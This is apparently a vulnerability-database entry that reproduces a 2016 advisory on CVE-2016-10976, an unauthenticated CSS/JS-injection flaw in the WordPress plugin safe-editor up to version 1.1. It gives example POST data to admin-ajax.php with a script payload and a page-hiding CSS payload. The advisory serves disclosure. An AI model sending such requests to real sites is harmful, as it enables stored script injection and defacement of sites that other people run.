Lucene search

K

safe-editor <= 1.1 - Unauthenticated CSS/JS-injection

πŸ—“οΈΒ 06 May 2016Β 00:00:00Reported byΒ Robert SΓ¦therTypeΒ 
wpexploit
Β wpexploit
πŸ‘Β 18Β Views

Unsafe CSS/JS-injection in safe-editor v1.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2016-10976
17 Sep 201915:15
–nvd
RedhatCVE
CVE-2016-10976
22 May 202509:07
–redhatcve
CVE
CVE-2016-10976
17 Sep 201915:15
–cve
WPVulnDB
safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
6 May 201600:00
–wpvulndb
Cvelist
CVE-2016-10976
17 Sep 201914:05
–cvelist
Prion
Authentication flaw
17 Sep 201915:15
–prion
Nuclei
Safe Editor Plugin < 1.2 - CSS/JS-injection
7 Nov 202407:40
–nuclei
In the file "index.php" (in root folder) on line 188 and 189 you can see that both private and public ajax-hooks are called and is referencing to the function "se_save".
This function does not do any authentication check or string sanitizing. Therefore you can inject whatever you want where the "wp_footer" and "wp_head" is called. With the use of for example cUrl or the chromeapp Postman this can be exploited with ease.

Example:
URL: http://www.site.com/wp-admin/admin-ajax.php

(Postdata displayed in JSON)

# JS injection
{
  type: 'js',
  data: 'alert("Hello world!");',
  action: 'se_save'
}

# CSS injection
{
  type: 'css',
  data: 'body { display: none !important; }',
  action: 'se_save'
}

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 May 2016 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.02444
18
.json
Report